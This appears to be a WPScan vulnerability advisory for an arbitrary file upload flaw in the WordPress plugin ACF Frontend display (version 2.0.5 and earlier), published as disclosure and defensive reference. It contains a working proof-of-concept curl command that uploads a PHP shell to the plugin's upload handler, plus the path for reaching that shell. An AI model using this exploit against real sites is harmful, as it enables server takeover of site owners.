ACF Frontend display <= 2.0.5 - Arbitrary File Upload

Sign up to our free email alerts service for instant vulnerability notifications!

Proof of Concept
curl -k -X POST -F "action=upload" -F "files=@evil.php" http://www.example.com/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php

Then access the shell in:

http://www.example.com/wp-content/uploads/uigen_2015/evil.php (may need to change the year in the file path to the current year)

Affects

Plugin acf-frontend-display

References

EXPLOITDB 37514
PACKETSTORM 132590
URL http://www.antihackers.ro/blog/wordpress-acf-frontend-display-plugin-2-0-5-file-upload-vulnerability/

Classification

Type UPLOAD
CWE CWE-434

Miscellaneous

Submitter ethicalhack3r
Submitter Website https://dewhurstsecurity.com/
Submitter Twitter ethicalhack3r
Views 355
Verified Yes
WPVDB ID 8086

Timeline

Publicly Published 2015-07-08 (over 1 year ago)
Added 2015-07-09 (over 1 year ago)
Last Updated 2015-07-12 (over 1 year ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.